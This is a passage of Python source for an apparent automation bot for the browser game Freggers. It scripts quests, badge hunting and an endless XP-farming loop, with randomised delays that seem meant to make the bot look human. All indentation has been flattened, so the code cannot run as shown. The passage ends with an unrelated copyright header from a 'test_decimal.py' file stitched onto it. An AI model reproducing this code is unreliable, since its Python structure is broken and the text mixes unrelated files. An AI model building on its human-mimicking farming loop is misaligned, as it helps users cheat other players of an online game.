self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_UNWRAP_AND_PLACE' or quest == 'TUTORIAL_PLACE_ALL_ITEMS': #3
self.log('[Quest] Unwrapping and placing all gifts in the apartment...')
self.unwrap_gifts(max_amount = 6)
if not self.__e_quest_done.wait(3):
inv = self.ajax_request_inventory()
slot_count = len(inv)
if not self.ensure_empty_slots(slot_count - 3, inv = inv):
self.log('[Quest] No inventory space available.')
return False
for item in inv:
if item != None:
item_menu = self.ajax_item_menu(item['id'], 'display')
print(item_menu)
break
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_DELIVER_CLOVER': #4
self.cut_clover(amount = 6)
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_FIND_EIGENHEIM': #1
self.log('[Quest] Going to apartment...')
self.go_to_home(FreggersBot.AP_APARTMENT, False)
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_FEED_THE_SHEEP': #5
self.log('[Quest] Feeding 6 sheeps...')
self.feed_sheeps()
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_COLLECT_FIRST_INGREDIENT': #6
self.log('[Quest] Collecting wood...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
wood_source = self.find_item_by_gui('western.stumpfmitbeil_dispenser')
self.send_item_interaction(wood_source.wob_id, 'SEARCH')
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_CRAFT_ITEM': #7
self.log('[Quest] Crafting item...')
wood_in_inv = self.filter_item(self.ajax_request_inventory(), self.localeItems.WOOD)
if len(wood_in_inv) == 0:
if not self.ensure_empty_slots(1):
self.log('[Quest] No inventory space available.')
return False
wood_in_queue = self.filter_item(self.ajax_request_item_queue(), self.localeItems.WOOD)
if len(wood_in_queue) == 0:
self.log('[Quest] Collecting wood...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
wood_source = self.find_item_by_gui('western.stumpfmitbeil_dispenser')
self.send_item_interaction(wood_source.wob_id, 'SEARCH')
self.__e_quest_done.wait()
else:
self.log('[Quest] Accepting wood from item queue...')
self.ajax_inbox_action(wood_in_queue[0]['id'], Freggers.INBOX_ACTION_ACCEPT)
self.craft_item(20, 8, 0)
self.__e_quest_done.wait()
self.log('[Quest] Completed. Completing next...')
return self.complete_quest()
elif quest == 'TUTORIAL_UNLOCK_CRAFTING_CATEGORY': #8
self.log('[Quest] Unlocking crafting category...')
self.__e_level_data.wait()
if self.level_data['level'] == 1:
self.collect_ants(max_amount = 3)
self.deliver_ants(amount = 3)
self.unlock_crafting_category(25)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return self.complete_quest()
elif quest == 'DAILY_DELIVER_SNAILS':
self.log('[Quest] Collecting 3 snails...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
self.__snail_count = 0
self.__snail_consumer_wob_id = None
snail_pickup_event = threading.Event()
def snail_cb_set_hand_held(data):
if data['gui'] == 'tp_botanik.eimerschnecken':
self.__snail_count = data['count']
self.__snail_consumer_wob_id = data['consumer_wobids'][0]
self.log('[Quest] Snail picked up ({}/4).'.format(self.__snail_count))
snail_pickup_event.set()
self.register_callback(Event.SET_HAND_HELD, snail_cb_set_hand_held)
snail_guis = ['tp_botanik.schneckegelb', 'tp_botanik.schneckerot', 'tp_botanik.schneckelila', 'tp_botanik.schneckeblau']
while self.__snail_count < 4:
for iso_item in list(self.wob_registry.iso_items):
if iso_item.gui in snail_guis:
snail_pickup_event.clear()
self.send_item_interaction(iso_item.wob_id, 'FILL_BUCKET')
snail_pickup_event.wait()
if self.__snail_count >= 4:
break
time.sleep(0.1)
self.log('[Quest] Picked up {} snails. Delivering...'.format(self.__snail_count))
self.send_use_handheld_with(self.__snail_consumer_wob_id)
self.__e_quest_done.wait()
self.unregister_callback(Event.SET_HAND_HELD, snail_cb_set_hand_held)
del self.__snail_count
del self.__snail_consumer_wob_id
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_RETURN_EMPTY_BOTTLES':
self.log('[Quest] Collecting 3 empty bottles...')
self.collect_bottles(max_amount = 3)
if self.return_bottles(amount = 3, beer_crates = False) == 3:
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
self.log('[Quest] Could not return 3 empty bottles.')
return False
elif quest == 'DAILY_DELIVER_DUNG':
self.log('[Quest] Delivering 8 buckets of dung to the composter...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
self.__dung_count = 0
self.__dung_consumer_wob_id = None
self.__dung_expect_event = 0
self.__dung_success = False
self.__dung_sheep_wob_id = None
self.__dung_sheep_state = 0
dung_event = threading.Event()
def dung_cb_set_hand_held(data):
if self.__dung_expect_event == 1 and data['gui'] == 'tp_botanik.eimerkacke':
self.__dung_expect_event = 0
self.__dung_count = data['count']
self.__dung_consumer_wob_id = data['consumer_wobids'][0]
self.log('[Quest] Dung collected ({}/4).'.format(self.__dung_count))
dung_event.set()
elif self.__dung_expect_event == 3 and data['gui'] == 'tp_botanik.powerriegel':
self.__dung_expect_event = 0
dung_event.set()
self.log('[Quest] Collected clover ({}) to feed sheep.'.format(data['count']))
def dung_cb_show_action(data):
if self.__dung_expect_event == 1:
self.__dung_expect_event = 0
self.__dung_success = False
dung_event.set()
def dung_cb_update_wob(data):
if self.__dung_expect_event == 2:
if data.effect != None:
if data.effect.gui == 'poof':
self.__dung_expect_event = 0
self.__dung_sheep_state = 1
dung_event.set()
elif data.animation != None:
if data.animation.name == 'happy':
self.__dung_expect_event = 0
self.__dung_sheep_state = 2
dung_event.set()
elif data.animation.name == 'needtopee':
self.__dung_expect_event = 0
self.__dung_sheep_state = 3
dung_event.set()
elif self.__dung_expect_event == 4:
if data.effect != None:
if data.effect.gui == 'dotsflowup':
self.__dung_expect_event = 0
dung_event.set()
def dung_cb_clear_hand_held():
if self.__dung_expect_event == 5:
self.__dung_expect_event = 0
dung_event.set()
self.register_callback(Event.SET_HAND_HELD, dung_cb_set_hand_held)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, dung_cb_show_action)
self.register_callback(Event.ACTION_UPDATE_WOB, dung_cb_update_wob)
self.register_callback(Event.CLEAR_HAND_HELD, dung_cb_clear_hand_held)
toilets = self.find_items_by_gui('tp_botanik.dixieklo')
sheeps = self.find_items_by_gui('tp_botanik.schaf')
weed_source = self.find_item_by_gui('tp_botanik.grashaufen')
for _ in range(2):
while self.__dung_count < 4:
for sheep in sheeps:
self.log('[Quest] Petting sheep...')
dung_event.clear()
self.__dung_sheep_state = 0
self.__dung_expect_event = 2
self.send_item_interaction(sheep.wob_id, 'PAT')
dung_event.wait()
if self.__dung_sheep_state == 2:
self.log('[Quest] Feeding sheep, before retrying to pet...')
dung_event.clear()
self.__dung_expect_event = 3
self.send_item_interaction(weed_source.wob_id, 'TAKE_POWERRIEGEL')
dung_event.wait()
self.log('[Quest] Giving clover to sheeps...')
for s in sheeps:
dung_event.clear()
self.__dung_expect_event = 4
self.send_use_handheld_with(s.wob_id)
dung_event.wait()
self.send_clear_handheld()
dung_event.clear()
self.__dung_expect_event = 2
self.send_item_interaction(sheep.wob_id, 'PAT')
dung_event.wait()
for toilet in toilets:
self.log('[Quest] Collecting dung from toilet...')
dung_event.clear()
self.__dung_expect_event = 1
self.send_item_interaction(toilet.wob_id, 'FILL_BUCKET')
dung_event.wait()
if self.__dung_count >= 4:
break
self.log('[Quest] Bringing dung to the compost...')
dung_event.clear()
self.__dung_expect_event = 5
self.send_use_handheld_with(self.__dung_consumer_wob_id)
dung_event.wait()
self.__dung_count = 0
self.log('[Quest] Dung is in compost.')
self.unregister_callback(Event.SET_HAND_HELD, dung_cb_set_hand_held)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, dung_cb_show_action)
self.unregister_callback(Event.ACTION_UPDATE_WOB, dung_cb_update_wob)
self.unregister_callback(Event.CLEAR_HAND_HELD, dung_cb_clear_hand_held)
del self.__dung_count
del self.__dung_consumer_wob_id
del self.__dung_expect_event
del self.__dung_success
del self.__dung_sheep_wob_id
del self.__dung_sheep_state
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_WATER_THE_PLANTS':
self.log('[Quest] Watering 6 exotic plants...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
water_source = self.find_item_by_gui('tp_botanik.trog')
watering_event = threading.Event()
self.__watering_pump_success = False
self.__watering_expect_event = 0
self.__water_count = 0
self.__watering_target_wob_ids = None
def watering_cb_show_action(data):
if self.__watering_expect_event == 1 and data == self.localeItems.ENOUGH_WATER:
self.__watering_expect_event = 0
watering_event.set()
def watering_cb_update_wob(data):
if (self.__watering_expect_event == 1 or self.__watering_expect_event == 3) and data.effect != None and data.effect.gui == 'dotsflowup':
self.__watering_expect_event = 0
self.__watering_pump_success = True
watering_event.set()
def watering_cb_set_hand_held(data):
if self.__watering_expect_event == 2 and data['gui'] == 'tp_botanik.giesskanne':
self.__watering_expect_event = 0
if self.__watering_target_wob_ids == None:
self.__watering_target_wob_ids = data['consumer_wobids']
self.__water_count = data['count']
self.log('[Quest] Collected water ({}/3).'.format(self.__water_count))
watering_event.set()
self.register_callback(Event.SHOW_ACTION_FEEDBACK, watering_cb_show_action)
self.register_callback(Event.ACTION_UPDATE_WOB, watering_cb_update_wob)
self.register_callback(Event.SET_HAND_HELD, watering_cb_set_hand_held)
for _ in range(2):
while self.__water_count < 3:
self.__watering_expect_event = 1
watering_event.clear()
self.send_item_interaction(water_source.wob_id, 'PUMP')
watering_event.wait()
self.wait_random_delay(2.1, 3.5)
if self.__watering_pump_success:
watering_event.clear()
self.__watering_expect_event = 1
self.send_item_interaction(water_source.wob_id, 'PUMP')
watering_event.wait()
self.wait_random_delay(2.1, 3.5)
watering_event.clear()
self.__watering_expect_event = 2
self.send_item_interaction(water_source.wob_id, 'TAKE_WATER')
watering_event.wait()
self.wait_random_delay(0.3, 2.5)
for _ in range(self.__water_count):
plant_wob_id = self.__watering_target_wob_ids.pop(random.randint(0, len(self.__watering_target_wob_ids) - 1))
self.log('[Quest] Watering exotic plant...')
watering_event.clear()
self.__watering_expect_event = 3
self.send_use_handheld_with(plant_wob_id)
watering_event.wait()
self.log('[Quest] Watered exotic plant.')
self.wait_random_delay(0.3, 1.5)
self.__water_count = 0
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, watering_cb_show_action)
self.unregister_callback(Event.ACTION_UPDATE_WOB, watering_cb_update_wob)
self.unregister_callback(Event.SET_HAND_HELD, watering_cb_set_hand_held)
del self.__watering_pump_success
del self.__watering_expect_event
del self.__water_count
del self.__watering_target_wob_ids
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_DELIVER_FERTILIZER':
self.log('[Quest] Delivering fertilizer to 6 exotic plants...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
fertilizer_source = self.find_item_by_gui('tp_botanik.komposthaufen')
fertilize_event = threading.Event()
self.__fertilize_expect_event = 0
self.__fertilizer_count = 0
self.__fertilizer_target_wob_ids = None
def fertilize_cb_set_handheld(data):
if self.__fertilize_expect_event == 1 and data['gui'] == 'tp_botanik.dungersack':
self.__fertilize_expect_event = 0
self.__fertilizer_count = data['count']
if self.__fertilizer_target_wob_ids == None:
self.__fertilizer_target_wob_ids = data['consumer_wobids']
fertilize_event.set()
def fertilize_cb_timer_bar(data):
if self.__fertilize_expect_event == 2:
self.__fertilize_expect_event = 0
fertilize_event.set()
print(data)
self.register_callback(Event.SHOW_TIMER_BAR, fertilize_cb_timer_bar)
self.register_callback(Event.SET_HAND_HELD, fertilize_cb_set_handheld)
for _ in range(2):
while self.__fertilizer_count < 4:
self.__fertilize_expect_event = 1
fertilize_event.clear()
self.send_item_interaction(fertilizer_source.wob_id, 'TAKE_DUENGER') #Timerbar: 800
fertilize_event.wait()
self.wait_random_delay(0.8, 2)
for _ in range(self.__fertilizer_count):
plant_wob_id = self.__fertilizer_target_wob_ids.pop(random.randint(0, len(self.__fertilizer_target_wob_ids) - 1))
self.log('[Quest] Giving fertilizer to exotic plant...')
fertilize_event.clear()
self.__fertilize_expect_event = 2
self.send_use_handheld_with(plant_wob_id) #Timerbar: 1600
fertilize_event.wait()
self.log('[Quest] Gave fertilizer to exotic plant.')
self.wait_random_delay(1.6, 3)
self.__fertilizer_count = 0
self.unregister_callback(Event.SHOW_TIMER_BAR, fertilize_cb_timer_bar)
self.unregister_callback(Event.SET_HAND_HELD, fertilize_cb_set_handheld)
del self.__fertilize_expect_event
del self.__fertilizer_count
del self.__fertilizer_target_wob_ids
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_DELIVER_MUSHROOMS':
self.log('[Quest] Collecting 6 mushrooms...')
guis = ['gothics.schwammerl1',
'gothics.schwammerl3',
'gothics.dickesschwammerl1',
'gothics.dickesschwammerl4',
'gothics.schwammerl5',
'gothics.dickesschwammerl3',
'gothics.dickesschwammerl5',
'gothics.schwammerl2']
inv = self.ajax_request_inventory()
queue = self.ajax_request_item_queue()
if self.count_item(inv, self.localeItems.MUSHROOM_BIG_BLUE) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_BIG_BLUE) > 0:
guis.remove('gothics.schwammerl1')
if self.count_item(inv, self.localeItems.MUSHROOM_BIG_RED) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_BIG_RED) > 0:
guis.remove('gothics.schwammerl2')
if self.count_item(inv, self.localeItems.MUSHROOM_BIG_BROWN) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_BIG_BROWN) > 0:
guis.remove('gothics.schwammerl5')
if self.count_item(inv, self.localeItems.MUSHROOM_BIG_GRAY) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_BIG_GRAY) > 0:
guis.remove('gothics.schwammerl3')
if self.count_item(inv, self.localeItems.MUSHROOM_SMALL_BROWN) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_SMALL_BROWN) > 0:
guis.remove('gothics.dickesschwammerl1')
if self.count_item(inv, self.localeItems.MUSHROOM_SMALL_GRAY) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_SMALL_GRAY) > 0:
guis.remove('gothics.dickesschwammerl4')
if self.count_item(inv, self.localeItems.MUSHROOM_SMALL_ORANGE) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_SMALL_ORANGE) > 0:
guis.remove('gothics.dickesschwammerl3')
if self.count_item(inv, self.localeItems.MUSHROOM_SMALL_WHITE) > 0 or self.count_item(queue, self.localeItems.MUSHROOM_SMALL_WHITE) > 0:
guis.remove('gothics.dickesschwammerl5')
if len(guis) > 2:
self.go_to_room('gothics.raum9', False)
self.__e_room_loaded.wait()
self.go_to_room('gothics.friedhof', False)
self.__e_room_loaded.wait()
self.go_to_room('gothics.eule', False)
self.__e_room_loaded.wait()
self.__mushrooms_expect_gui = None
self.__mushrooms_pickup_wob_id = None
self.__mushrooms_pickup_success = False
self.__mushrooms_collected = 0
mushroom_pickup_event = threading.Event()
def mushrooms_cb_create_item(data):
if data['gui'] == self.__mushrooms_expect_gui:
self.__mushrooms_collected += 1
self.__mushrooms_pickup_success = True
def mushrooms_cb_env_remove_item(data):
if self.__mushrooms_pickup_wob_id in data['wobids']:
mushroom_pickup_event.set()
def mushrooms_cb_show_action(data):
if data == self.localeItems.MUSHROOM_ALREADY_IN_INV:
self.__mushrooms_pickup_success = True
mushroom_pickup_event.set()
self.register_callback(Event.NOTIFY_CREATE_ITEM, mushrooms_cb_create_item)
self.register_callback(Event.ENV_REMOVE_ITEMS, mushrooms_cb_env_remove_item)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, mushrooms_cb_show_action)
while self.__mushrooms_collected < 6 and len(guis) > 0:
mushroom = self.closest_iso_item(list(filter(lambda iso_item: iso_item.gui in guis, self.wob_registry.iso_items)))
self.log('[Quest] Picking up mushroom \'{}\'...'.format(mushroom.name))
self.__mushrooms_expect_gui = mushroom.gui
self.__mushrooms_pickup_success = False
self.__mushrooms_pickup_wob_id = mushroom.wob_id
mushroom_pickup_event.clear()
count_before = self.__mushrooms_collected
self.send_item_interaction(mushroom.wob_id, 'USE')
mushroom_pickup_event.wait()
if self.__mushrooms_pickup_success:
guis.remove(mushroom.gui)
if count_before < self.__mushrooms_collected:
self.log('[Quest] Picked up mushroom \'{}\'.'.format(mushroom.name))
self.wait_random_delay(FreggersBot.MIN_SEARCH_DONE_DELAY, FreggersBot.MAX_SEARCH_DONE_DELAY)
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, mushrooms_cb_create_item)
self.unregister_callback(Event.ENV_REMOVE_ITEMS, mushrooms_cb_env_remove_item)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, mushrooms_cb_show_action)
del self.__mushrooms_expect_gui
del self.__mushrooms_pickup_wob_id
del self.__mushrooms_pickup_success
del self.__mushrooms_collected
self.go_to_room('western.rail', False)
self.__e_room_loaded.wait()
self.go_to_room('western.indianerdorf', False)
self.__e_room_loaded.wait()
mushrooms_in_inv = len(self.filter_items(self.ajax_request_inventory(), self.localeItems.MUSHROOMS))
if mushrooms_in_inv == 0 and not self.ensure_empty_slots(1):
self.log('[Quest] No inventory space available.')
return False
mushrooms_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.MUSHROOMS)
mushroom_deliver_event = threading.Event()
def mushrooms_cb_timer_bar(data):
mushroom_deliver_event.set()
self.register_callback(Event.SHOW_TIMER_BAR, mushrooms_cb_timer_bar)
target = self.find_item_by_gui('western.feuerstelle_topf')
len_mushrooms = mushrooms_in_inv + len(mushrooms_in_queue)
for _ in range(len_mushrooms):
if mushrooms_in_inv == 0:
item = mushrooms_in_queue.pop(0)
self.ajax_inbox_action(item['id'], Freggers.INBOX_ACTION_ACCEPT)
else:
mushrooms_in_inv -= 1
mushroom_deliver_event.clear()
self.send_item_interaction(target.wob_id, 'DELIVER_MUSHROOM')
mushroom_deliver_event.wait()
self.log('[Quest] Delivered mushroom.')
self.wait_random_delay(1, 2.5)
self.unregister_callback(Event.SHOW_TIMER_BAR, mushrooms_cb_timer_bar)
self.log('[Quest] Delivered {} mushrooms.'.format(len_mushrooms))
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_DELIVER_ANTS':
self.log('[Quest] Delivering 2 ants...')
ant_count = (len(self.filter_items(self.ajax_request_inventory(), self.localeItems.LAZY_ANTS)) +
len(self.filter_items(self.ajax_request_item_queue(), self.localeItems.LAZY_ANTS)))
remaining = 2 - ant_count
if remaining > 0:
self.collect_ants(max_amount = remaining)
self.deliver_ants(amount = 2)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_DELIVER_CLOVER':
self.cut_clover(amount = 16)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_FEED_THE_SHEEP':
self.log('[Quest] Feeding 6 sheeps...')
self.feed_sheeps()
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
elif quest == 'DAILY_REMOVE_PARASITES':
self.log('[Quest] Removing parasites from 9 exotic plants...')
self.go_to_room('tp_botanik.azubi', False)
self.__e_room_loaded.wait()
bugs_event = threading.Event()
def bugs_cb_timer_bar(data):
bugs_event.set()
self.register_callback(Event.SHOW_TIMER_BAR, bugs_cb_timer_bar)
plants = list(filter(lambda iso_item: iso_item.has_interaction('REMOVE_BUGS'), self.wob_registry.iso_items))
for _ in range(len(plants)):
plant = self.sort_iso_items_by_distance(plants)[0]
plants.remove(plant)
bugs_event.clear()
self.send_item_interaction(plant.wob_id, 'REMOVE_BUGS')
bugs_event.wait()
self.wait_random_delay(0.6, 1.8)
self.unregister_callback(Event.SHOW_TIMER_BAR, bugs_cb_timer_bar)
self.__e_quest_done.wait()
self.log('[Quest] Completed.')
return True
else:
print('[Quest] Unknown quest:', quest)
return False
def complete_badges(self):
search = ItemSearch(self, 0)
def search_badge_item(wob_id):
search.wob_id = wob_id
search.search()
self.wait_random_delay(0.5, 3.5)
badge_page = self.get_badge_page()
if not self.get_is_badge_completed(8, badge_page = badge_page):
self.log('[Badge] Completing explorer badge - Wutzlhofen...')
tasks = self.get_badge_tasks(8)
if not tasks[0]:
self.go_to_room('wutzlhofen.flussdampfer', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('wutzlhofen.flussdampfer_kabeltrommel').wob_id)
if not tasks[1]:
self.go_to_room('wutzlhofen.biergarten', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('wutzlhofen.biergarten_biergartenschirmstaender').wob_id)
if not tasks[2]:
self.go_to_room('wutzlhofen.bistro', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('wutzlhofen.bistro_sofadreisitzer'))).wob_id)
if not self.get_is_badge_completed(9):
self.log('[Badge] Completing explorer badge - Hood...')
tasks = self.get_badge_tasks(9)
if not tasks[0]:
self.go_to_room('hood.outskirts', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('hood.outskirts_muellhaufen'))).wob_id)
if not tasks[1]:
self.go_to_room('hood.strasse', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('hood.strasse_muelltonneliegend').wob_id)
if not tasks[2]:
self.go_to_room('hood.waschsalon', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('hood.waschsalon_waschmaschine'))).wob_id)
if not self.get_is_badge_completed(10):
self.log('[Badge] Completing explorer badge - Tumbleweed Valley')
tasks = self.get_badge_tasks(10)
if not tasks[0]:
self.go_to_room('western.fort', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.iso_obj.get_uvz().x == 239, self.find_items_by_gui('western.kanonenkugeln'))).wob_id)
if not tasks[1]:
self.go_to_room('western.saloonzimmer1', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('western.badezuber').wob_id)
if not tasks[2]:
self.go_to_room('western.backlands', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('western.backlands_sitzstein1').wob_id)
if not self.get_is_badge_completed(20):
self.log('[Badge] Completing explorer badge - Schattenland')
tasks = self.get_badge_tasks(20)
if not tasks[0]:
self.go_to_room('gothics.friedhof', False)
self.wait_room_loaded()
time.sleep(1.5)
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('gothics.friedhof_uferbank'))).wob_id)
if not tasks[1]:
self.go_to_room('gothics.gruft', False)
self.wait_room_loaded()
search_badge_item(next(filter(lambda x: x.has_interaction('SEARCH'), self.find_items_by_gui('hood.getraenkedoserot'))).wob_id)
if not tasks[2]:
self.go_to_room('gothics.kirche', False)
self.wait_room_loaded()
search_badge_item(self.find_item_by_gui('gothics.kirche_reliquienschrein').wob_id)
search.cleanup()
if not self.get_is_badge_completed(21):
self.log('[Badge] Completing games badge')
tasks = self.get_badge_tasks(21)
if not tasks[0]:
self.send_set_status(Status.PLAYING, 'astrovoids')
self.send_delete_status(Status.PLAYING)
if not tasks[1]:
self.send_set_status(Status.PLAYING, 'jewels')
self.send_delete_status(Status.PLAYING)
if not tasks[2]:
self.send_set_status(Status.PLAYING, 'puzzle')
self.send_delete_status(Status.PLAYING)
if not tasks[3]:
self.send_set_status(Status.PLAYING, 'deserthunter')
self.send_delete_status(Status.PLAYING)
if not tasks[4]:
self.send_set_status(Status.PLAYING, 'whackthehampster')
self.send_delete_status(Status.PLAYING)
if not self.get_is_badge_completed(31):
self.log('[Badge] Completing sounds badge')
tasks = self.get_badge_tasks(31)
if not tasks[0]:
self.go_to_room('hood.backalley', False)
self.wait_room_loaded()
self.send_user_command('miau')
if not tasks[1]:
self.go_to_room('western.saloon', False)
self.wait_room_loaded()
self.send_user_command('ruelps')
if not tasks[2]:
self.go_to_room('wutzlhofen.museum', False)
self.wait_room_loaded()
self.send_user_command('nies')
if not tasks[3]:
self.go_to_room('gothics.kirche', False)
self.wait_room_loaded()
self.send_user_command('gaehn')
if not tasks[4]:
self.go_to_home('plattenbau.eigenheim', False)
self.wait_room_loaded()
self.send_user_command('furz')
if not self.__church_visited_today and not self.get_is_badge_completed(41) and get_local_datetime().weekday() == 6:
self.log('[Badge] Completing church visitor badge')
self.go_to_room('gothics.kirche', False)
self.__church_visited_today = True
self.wait_room_loaded()
self.wait_random_delay(0.5, 3)
def daily_routine(self, skip_first_cycle = False, idle_room = 'plattenbau%2.eigenheim', idle_room_alt = 'plattenbau.plattenbau',
care_pets = False, care_pompom = False, complete_quests = False, complete_badges = False, maintain_amount = 25, overload_amount = 100, min_deliver_amount = 3,
loop_min_idle_sec = 60 * 60, loop_max_idle_sec = 2 * 60 * 60):
self.log('Beginning daily routine...')
if skip_first_cycle:
self.__church_visited_today = True
self.send_delete_status(Status.PRANKED)
self.send_delete_status(Status.PLAYING)
self.send_delete_status(Status.GHOST)
self.send_delete_status(Status.SPOOK)
self.send_delete_status(Status.WITCHBROOM)
self.send_delete_status(Status.CLOAK)
self.send_set_status(Status.NOSOUND)
next_quick_strong = 0
loop_min_idle_sec *= 1000
loop_max_idle_sec *= 1000
last_day = -1
ant_amount = self.get_items_count(self.localeItems.LAZY_ANTS)
total_ants_delivered = 0
total_ants_collected = 0
total_covered_wagon = 0
total_construction_site = 0
total_time_idle = 0
start_time = time.time()
last_delivery = -1
self.__e_level_data.wait()
start_level = self.level_data['level']
while True:
if next_quick_strong <= time.time():
self.send_set_status(Status.QUICK_STRONG)
next_quick_strong = time.time() + 604800
self.log('Added strong speed effect.')
if complete_quests:
self.complete_quest()
now_day = get_local_datetime().day
day_change = now_day != last_day and (last_day != -1 or not skip_first_cycle)
empty_slots = FreggersBot.count_empty_slots(self.ajax_request_inventory())
while empty_slots > 0:
self.log('Filling {} empty slots with ants...'.format(empty_slots))
ants_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.LAZY_ANTS)
missing_ants = empty_slots - len(ants_in_queue)
for _ in range(min(empty_slots, len(ants_in_queue))):
ant_in_queue = ants_in_queue.pop(0)
self.ajax_inbox_action(ant_in_queue['id'], Freggers.INBOX_ACTION_ACCEPT)
self.log('Filled empty slot with ant.')
if missing_ants > 0:
self.log('Not enough ants available to fill all empty slots. Collecting {} ants...'.format(missing_ants))
self.collect_ants(max_amount = missing_ants)
empty_slots = FreggersBot.count_empty_slots(self.ajax_request_inventory())
if day_change:
self.__church_visited_today = False
if self.search_covered_wagon():
total_covered_wagon += 1
if self.search_noisy_construction_site():
total_construction_site += 1
self.__e_level_data.wait()
level_up_expected = self.level_data['xp_total'] == self.level_data['xp_cap']
ants_to_deliver = 20 if day_change else math.ceil((self.level_data['xp_cap'] - self.level_data['xp_current']) / 559)
if not level_up_expected and ants_to_deliver < min_deliver_amount:
self.log('Not enough ants to deliver ({} / {}). Waiting for a higher xp cap.'.format(ants_to_deliver, min_deliver_amount))
ants_to_deliver = 0
if ant_amount < ants_to_deliver:
self.log('Collecting {} ants to deliver...'.format(ants_to_deliver - ant_amount))
collected_ants = self.collect_ants(max_amount = ants_to_deliver - ant_amount)
ant_amount += collected_ants
total_ants_collected += collected_ants
self.log('Collected {} ants.'.format(collected_ants))
if ants_to_deliver > 0:
if last_delivery != -1:
self.log('Last delivery is {} ago.'.format(format_time(time.time() - last_delivery)))
self.log('Delivering {} ants...'.format(ants_to_deliver))
delivered_ants = self.deliver_ants(amount = ants_to_deliver)
if delivered_ants == 0:
level_up_expected = False
ant_amount -= delivered_ants
total_ants_delivered += delivered_ants
last_delivery = time.time()
self.log('Delivered {} ants.'.format(delivered_ants))
if not level_up_expected:
if ant_amount < maintain_amount:
collect_amount = maintain_amount - ant_amount + overload_amount
self.log('Collecting {} ants to maintain the minimum amount of ants...'.format(collect_amount))
collected_ants = self.collect_ants(max_amount = collect_amount)
ant_amount += collected_ants
total_ants_collected += collected_ants
self.log('Collected {} ants.'.format(collected_ants))
self.log('[Stats] Ants: current = {} | collected = {} | delivered = {}'.format(ant_amount, total_ants_collected, total_ants_delivered))
self.log('[Stats] Construction site searches:', total_construction_site)
self.log('[Stats] Covered wagon searches:', total_covered_wagon)
self.log('[Stats] Level-ups:', (self.level_data['level'] - start_level))
self.log('[Stats] Total time idling:', format_time(total_time_idle))
self.log('[Stats] Total time running:', format_time(time.time() - start_time))
if complete_badges:
self.complete_badges()
self.delete_trash_items()
self.go_to_home(idle_room, True)
if care_pets:
self.care_pets(idle_room, True)
if care_pompom:
self.care_pompom(idle_room, True)
self.daily_routine_on_idle()
idle_time = random.randint(loop_min_idle_sec, loop_max_idle_sec) / 1000
self.log('Idling for {}...'.format(format_time(idle_time)))
time.sleep(idle_time)
total_time_idle += idle_time
self.go_to_room(idle_room_alt, False)
last_day = now_day
def daily_routine_on_idle(self):
seats = list(filter(lambda item: item.get_primary_interaction() != None and item.get_primary_interaction().label == 'SIT_DOWN', self.wob_registry.iso_items))
if len(seats) > 0:
self.send_item_interaction(random.choice(seats).wob_id, 'SIT_DOWN')
def print_items(self):
for wob in self.wob_registry.iso_items:
print(wob.wob_id, wob.gui, wob.name, wob.interactions, wob.get_properties())
def wait_room_loaded(self):
self.__e_room_loaded.wait() |
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
